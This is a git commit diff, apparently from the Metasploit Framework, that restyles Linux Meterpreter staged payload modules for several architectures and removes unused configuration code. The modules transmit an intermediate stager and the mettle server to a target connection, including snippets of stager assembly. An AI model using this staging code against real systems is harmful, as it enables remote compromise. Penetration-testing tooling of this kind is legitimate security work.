unify stager style
Brent Cook
parent
e404dfeaea
commit
21bede1166
|
|
@ -11,22 +11,25 @@ module MetasploitModule
|
|||
include Msf::Sessions::MeterpreterOptions
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Linux Meterpreter',
|
||||
'Description' => 'Inject the mettle server payload (staged)',
|
||||
'Author' => [
|
||||
'Adam Cammack <adam_cammack[at]rapid7.com'
|
||||
],
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_ARMLE,
|
||||
'License' => MSF_LICENSE,
|
||||
'Session' => Msf::Sessions::Meterpreter_armle_Linux))
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => 'Linux Meterpreter',
|
||||
'Description' => 'Inject the mettle server payload (staged)',
|
||||
'Author' => [
|
||||
'Adam Cammack <adam_cammack[at]rapid7.com>'
|
||||
],
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_ARMLE,
|
||||
'License' => MSF_LICENSE,
|
||||
'Session' => Msf::Sessions::Meterpreter_armle_Linux
|
||||
)
|
||||
)
|
||||
end
|
||||
|
||||
def elf_ep(payload)
|
||||
elf = Rex::ElfParsey::Elf.new(Rex::ImageSource::Memory.new(payload))
|
||||
ep = elf.elf_header.e_entry
|
||||
return ep
|
||||
elf.elf_header.e_entry
|
||||
end
|
||||
|
||||
def handle_intermediate_stage(conn, payload)
|
||||
|
|
@ -70,15 +73,12 @@ module MetasploitModule
|
|||
entry_offset
|
||||
].pack('V*')
|
||||
|
||||
print_status("Transmitting intermediate stager for over-sized stage...(#{midstager.length} bytes)")
|
||||
|
||||
conn.put [midstager.length].pack('V')
|
||||
conn.put midstager
|
||||
|
||||
true
|
||||
vprint_status("Transmitting intermediate stager...(#{midstager.length} bytes)")
|
||||
conn.put([midstager.length].pack('V'))
|
||||
conn.put(midstager) == midstager.length
|
||||
end
|
||||
|
||||
def generate_stage(opts={})
|
||||
def generate_stage(_opts = {})
|
||||
MetasploitPayloads::Mettle.read('arm-linux-musleabi', 'mettle.bin')
|
||||
end
|
||||
end
|
||||
|
|
|
|||
|
|
@ -12,22 +12,25 @@ module MetasploitModule
|
|||
include Msf::Sessions::MeterpreterOptions
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Linux Meterpreter',
|
||||
'Description' => 'Inject the mettle server payload (staged)',
|
||||
'Author' => [
|
||||
'Adam Cammack <adam_cammack[at]rapid7.com>'
|
||||
],
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_MIPSBE,
|
||||
'License' => MSF_LICENSE,
|
||||
'Session' => Msf::Sessions::Meterpreter_mipsbe_Linux))
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => 'Linux Meterpreter',
|
||||
'Description' => 'Inject the mettle server payload (staged)',
|
||||
'Author' => [
|
||||
'Adam Cammack <adam_cammack[at]rapid7.com>'
|
||||
],
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_MIPSBE,
|
||||
'License' => MSF_LICENSE,
|
||||
'Session' => Msf::Sessions::Meterpreter_mipsbe_Linux
|
||||
)
|
||||
)
|
||||
end
|
||||
|
||||
def elf_ep(payload)
|
||||
elf = Rex::ElfParsey::Elf.new( Rex::ImageSource::Memory.new( payload ) )
|
||||
ep = elf.elf_header.e_entry
|
||||
return ep
|
||||
elf = Rex::ElfParsey::Elf.new(Rex::ImageSource::Memory.new(payload))
|
||||
elf.elf_header.e_entry
|
||||
end
|
||||
|
||||
def handle_intermediate_stage(conn, payload)
|
||||
|
|
@ -83,40 +86,11 @@ module MetasploitModule
|
|||
0
|
||||
].pack('N*')
|
||||
|
||||
print_status("Transmitting intermediate stager for over-sized stage...(#{midstager.length} bytes)")
|
||||
conn.put(midstager)
|
||||
|
||||
true
|
||||
vprint_status("Transmitting intermediate stager...(#{midstager.length} bytes)")
|
||||
conn.put(midstager) == midstager.length
|
||||
end
|
||||
|
||||
def generate_stage(opts={})
|
||||
meterpreter = generate_meterpreter
|
||||
#config = generate_config(opts)
|
||||
#meterpreter + config
|
||||
end
|
||||
|
||||
def generate_meterpreter
|
||||
def generate_stage(_opts = {})
|
||||
MetasploitPayloads::Mettle.read('mips-linux-muslsf', 'mettle.bin')
|
||||
end
|
||||
|
||||
def generate_config(opts={})
|
||||
opts[:uuid] ||= generate_payload_uuid
|
||||
|
||||
# create the configuration block, which for staged connections is really simple.
|
||||
config_opts = {
|
||||
:arch => opts[:uuid].arch,
|
||||
:exitfunk => nil,
|
||||
:expiration => datastore['SessionExpirationTimeout'].to_i,
|
||||
:uuid => opts[:uuid],
|
||||
:transports => [transport_config(opts)],
|
||||
:extensions => [],
|
||||
:ascii_str => true
|
||||
}
|
||||
|
||||
# create the configuration instance based off the parameters
|
||||
config = Rex::Payloads::Meterpreter::Config.new(config_opts)
|
||||
|
||||
# return the binary version of it
|
||||
config.to_b
|
||||
end
|
||||
end
|
||||
|
|
|
|||
|
|
@ -12,22 +12,25 @@ module MetasploitModule
|
|||
include Msf::Sessions::MeterpreterOptions
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Linux Meterpreter',
|
||||
'Description' => 'Inject the mettle server payload (staged)',
|
||||
'Author' => [
|
||||
'Adam Cammack <adam_cammack[at]rapid7.com>'
|
||||
],
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_MIPSLE,
|
||||
'License' => MSF_LICENSE,
|
||||
'Session' => Msf::Sessions::Meterpreter_mipsle_Linux))
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => 'Linux Meterpreter',
|
||||
'Description' => 'Inject the mettle server payload (staged)',
|
||||
'Author' => [
|
||||
'Adam Cammack <adam_cammack[at]rapid7.com>'
|
||||
],
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_MIPSLE,
|
||||
'License' => MSF_LICENSE,
|
||||
'Session' => Msf::Sessions::Meterpreter_mipsle_Linux
|
||||
)
|
||||
)
|
||||
end
|
||||
|
||||
def elf_ep(payload)
|
||||
elf = Rex::ElfParsey::Elf.new( Rex::ImageSource::Memory.new( payload ) )
|
||||
ep = elf.elf_header.e_entry
|
||||
return ep
|
||||
elf = Rex::ElfParsey::Elf.new(Rex::ImageSource::Memory.new(payload))
|
||||
elf.elf_header.e_entry
|
||||
end
|
||||
|
||||
def handle_intermediate_stage(conn, payload)
|
||||
|
|
@ -83,40 +86,11 @@ module MetasploitModule
|
|||
0
|
||||
].pack('V*')
|
||||
|
||||
print_status("Transmitting intermediate stager for over-sized stage...(#{midstager.length} bytes)")
|
||||
conn.put(midstager)
|
||||
|
||||
true
|
||||
vprint_status("Transmitting intermediate stager...(#{midstager.length} bytes)")
|
||||
conn.put(midstager) == midstager.length
|
||||
end
|
||||
|
||||
def generate_stage(opts={})
|
||||
meterpreter = generate_meterpreter
|
||||
#config = generate_config(opts)
|
||||
#meterpreter + config
|
||||
end
|
||||
|
||||
def generate_meterpreter
|
||||
def generate_stage(_opts = {})
|
||||
MetasploitPayloads::Mettle.read('mipsel-linux-muslsf', 'mettle.bin')
|
||||
end
|
||||
|
||||
def generate_config(opts={})
|
||||
opts[:uuid] ||= generate_payload_uuid
|
||||
|
||||
# create the configuration block, which for staged connections is really simple.
|
||||
config_opts = {
|
||||
:arch => opts[:uuid].arch,
|
||||
:exitfunk => nil,
|
||||
:expiration => datastore['SessionExpirationTimeout'].to_i,
|
||||
:uuid => opts[:uuid],
|
||||
:transports => [transport_config(opts)],
|
||||
:extensions => [],
|
||||
:ascii_str => true
|
||||
}
|
||||
|
||||
# create the configuration instance based off the parameters
|
||||
config = Rex::Payloads::Meterpreter::Config.new(config_opts)
|
||||
|
||||
# return the binary version of it
|
||||
config.to_b
|
||||
end
|
||||
end
|
||||
|
|
|
|||
|
|
@ -81,6 +81,7 @@ module MetasploitModule
|
|||
add rsi, rax
|
||||
jmp rsi
|
||||
)
|
||||
|
||||
midstager = Metasm::Shellcode.assemble(Metasm::X64.new, midstager_asm).encode_string
|
||||
vprint_status("Transmitting intermediate stager...(#{midstager.length} bytes)")
|
||||
conn.put(midstager) == midstager.length
|
||||
|
|
|
|||
|
|
@ -84,6 +84,7 @@ module MetasploitModule
|
|||
add edx, eax
|
||||
jmp edx
|
||||
)
|
||||
|
||||
midstager = Metasm::Shellcode.assemble(Metasm::X86.new, midstager_asm).encode_string
|
||||
vprint_status("Transmitting intermediate stager...(#{midstager.length} bytes)")
|
||||
conn.put(midstager) == midstager.length
|
||||
|
|
|
|||
Loading…
Reference in New Issue